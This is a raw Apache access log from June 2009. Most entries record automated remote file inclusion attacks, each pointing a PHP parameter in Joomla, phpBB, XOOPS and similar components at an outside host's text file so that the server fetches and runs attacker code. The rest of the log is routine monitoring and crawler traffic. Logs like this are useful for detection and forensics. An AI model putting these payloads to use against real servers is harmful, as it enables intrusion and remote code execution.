87.16.83.24 - - [28/Jun/2009:07:54:32 -0400] "GET /logs/?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 200 7314 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:07:54:45 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
151.1.219.156 - - [28/Jun/2009:07:54:48 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
151.1.219.156 - - [28/Jun/2009:07:54:48 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.219.156 - - [28/Jun/2009:07:54:48 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 7314 "-" "Mozilla/5.0"
119.201.245.60 - - [28/Jun/2009:07:54:54 -0400] "GET /index.php?cont=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
119.201.245.60 - - [28/Jun/2009:07:54:54 -0400] "GET /logs/index.php?cont=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
119.201.245.60 - - [28/Jun/2009:07:54:54 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?cont=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.16.83.24 - - [28/Jun/2009:07:55:08 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:55:38 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:55:38 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:55:38 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
119.201.245.60 - - [28/Jun/2009:07:55:43 -0400] "GET /logs/error_log.Q109051400%20%20/index.php?cont=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
86.109.166.161 - - [28/Jun/2009:07:57:33 -0400] "GET /logs/access_log.Q109051600%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:07:57:35 -0400] "GET /logs/access_log.Q109051600%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.820"
211.189.18.73 - - [28/Jun/2009:07:57:38 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:57:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.38.188.128 - - [28/Jun/2009:07:57:50 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
66.249.71.204 - - [28/Jun/2009:07:58:02 -0400] "GET /logs/access_log.Q108021900 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.142.148.142 - - [28/Jun/2009:07:58:37 -0400] "GET /logs/access_log.Q109052800%20%20////include/bbs.lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:07:58:38 -0400] "GET /logs/error_log.Q109052800%20%20////include/bbs.lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:07:58:50 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 2869991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.179 - - [28/Jun/2009:07:58:56 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 2869991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.162.115.67 - - [28/Jun/2009:07:59:13 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:59:13 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:59:13 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:59:27 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:07:59:31 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:00:11 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
119.201.245.60 - - [28/Jun/2009:08:01:40 -0400] "GET /logs/access_log.Q109051400/index.php?cont=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
119.201.245.60 - - [28/Jun/2009:08:01:54 -0400] "GET /logs/access_log.Q109052300/index.php?cont=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:02:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.86.9.234 - - [28/Jun/2009:08:04:04 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:04:04 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:04:04 -0400] "GET /logs/access_log.Q109061600%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.244.95.131 - - [28/Jun/2009:08:04:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
87.244.95.131 - - [28/Jun/2009:08:04:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
218.30.100.97 - - [28/Jun/2009:08:04:49 -0400] "GET //main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.30.100.97 - - [28/Jun/2009:08:04:49 -0400] "GET /logs/access_log.Q109050900//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.30.100.97 - - [28/Jun/2009:08:04:50 -0400] "GET /logs//main.php?_shop_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:05:33 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:05:36 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:05:37 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:06:12 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:06:15 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:06:17 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Jun/2009:08:06:40 -0400] "GET /logs/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Jun/2009:08:06:40 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:07:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [28/Jun/2009:08:09:15 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:08:09:15 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:08:10:01 -0400] "GET /logs/access_log.Q108030700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.142.148.142 - - [28/Jun/2009:08:10:16 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:08:10:16 -0400] "GET /logs/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:10:57 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:10:57 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:10:58 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:11:14 -0400] "GET /logs/access_log.Q109051300//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:11:20 -0400] "GET /logs/access_log.Q109052700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:11:20 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:11:20 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:11:27 -0400] "GET /logs/access_log.Q109060300//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:11:29 -0400] "GET /logs/access_log.Q109052900%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:12:14 -0400] "GET /logs/access_log.Q109052400%20%20//phpAdsNew/view.inc.php?phpAds_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:12:14 -0400] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:12:14 -0400] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:12:22 -0400] "GET /logs/access_log.Q109060300%20%20//phpAdsNew/view.inc.php?phpAds_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:12:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.142.148.142 - - [28/Jun/2009:08:12:55 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:13:11 -0400] "GET //index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:13:11 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:13:11 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:13:11 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:08:13:49 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:15:26 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.86.9.234 - - [28/Jun/2009:08:15:26 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:50 -0400] "GET //skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:50 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:50 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:55 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:56 -0400] "GET //skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:56 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:15:56 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.162.115.67 - - [28/Jun/2009:08:16:06 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:16:28 -0400] "GET /logs/access_log.Q109052400//phpAdsNew/view.inc.php?phpAds_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:16:28 -0400] "GET /logs/access_log.Q109060300//phpAdsNew/view.inc.php?phpAds_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Jun/2009:08:17:20 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:17:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
166.205.130.187 - - [28/Jun/2009:08:18:01 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 109645 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
58.227.193.198 - - [28/Jun/2009:08:18:11 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:08:18:11 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:08:18:11 -0400] "GET /logs/access_log.Q109052700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Jun/2009:08:18:34 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:08:18:36 -0400] "GET /logs/access_log.Q109052900%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:08:19:16 -0400] "GET /images/items/2pc_kit_full.jpg HTTP/1.1" 200 14751 "-" "Googlebot-Image/1.0"
83.98.209.71 - - [28/Jun/2009:08:20:08 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:08:20:08 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:08:20:08 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:08:20:37 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:08:20:37 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.16.83.24 - - [28/Jun/2009:08:20:51 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:17 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:17 -0400] "GET /logs/access_log.Q109061600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:17 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:08:21:17 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:08:21:17 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:08:21:17 -0400] "GET /logs/access_log.Q109061600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:08:21:28 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:31 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:31 -0400] "GET /logs/access_log.Q109061600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:31 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:21:42 -0400] "GET /logs/access_log.Q109051100%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:08:21:57 -0400] "GET /logs/access_log.Q109051100%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:08:22:01 -0400] "GET /logs/error_log.Q107082700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.51.133.202 - - [28/Jun/2009:08:22:03 -0400] "GET /logs/access_log.Q109051100%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:22:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.51.133.202 - - [28/Jun/2009:08:23:24 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:23:26 -0400] "GET /logs/access_log.Q109061600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:08:23:26 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
